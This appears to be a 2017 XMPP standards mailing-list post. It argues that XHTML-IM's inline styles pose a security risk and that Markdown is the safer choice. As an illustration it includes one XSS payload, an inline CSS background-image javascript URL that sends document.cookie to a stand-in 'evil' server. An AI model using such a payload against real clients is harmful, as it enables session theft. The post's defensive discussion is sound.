On 12 October 2017 at 09:27, Goffi <go...@goffi.org> wrote:
> Hi David,
>
> Le jeudi 12 octobre 2017, 10:09:41 CEST Dave Cridland a écrit :
>
>> There are dozens of quite reasonable Markdown libraries in Javascript.
>> These will handle, suppress, and otherwise deal with embedded HTML.
>> Every other IM system I can find just does Markdown of some flavour.
>> XHTML is, pretty much, dead at this point anyway.
>
> There are dozens of flavours of Markdown, not always compatible, it's not a
> syntax adapted for XML, and it's really limited (no table/color by default for
> instance). Markdown is not standardized, which makes it quite a bad choice to
> be used in a standard protocol. And what if in 5 years another syntax is
> trendy?
>

I think there may be an argument for XHTML-IM in things other than IM,
yes. Which is ironic considering the name.

But out of curiosity, do you allow inline style in your uses of XHTML-IM?

So can something like the following work:

<p style='background-image: url(&quot;javascript:new
Image().src=&apos;http://my.evil.server/?cookie=&apos; +
encodeURI(document.cookie);&quot;);'>Hello</p>

A solid CSP will block this for newer browsers, of course, and
background-image is a SHOULD NOT in XEP-0071 as well. But I'd be
surprised if many implementations are filtering CSS at the property
level.

I'm depressingly well aware of the failure of Markdown to standardize
on a single dialect, but I'm also well aware that the state of the art
in HTML-based applications is to use simple Markdown rather than HTML
for any user entered rich text, because of the very high risk of
security problems.

> I don't really see the point of changing to a syntax just because it's popular
> now when XHTML-IM is perfectly adapted to XML, standardized, and working well
> (and Markdown can be trivially converted to XHTML-IM, so it's already usable
> at the moment).
>
> And again, we are going for years of incompatibilities by changing it now.

Honestly, I think we're trading years of insecurity for a little
incompatibility.

Dave.
_______________________________________________
Standards mailing list
Info: https://mail.jabber.org/mailman/listinfo/standards
Unsubscribe: standards-unsubscr...@xmpp.org
_______________________________________________
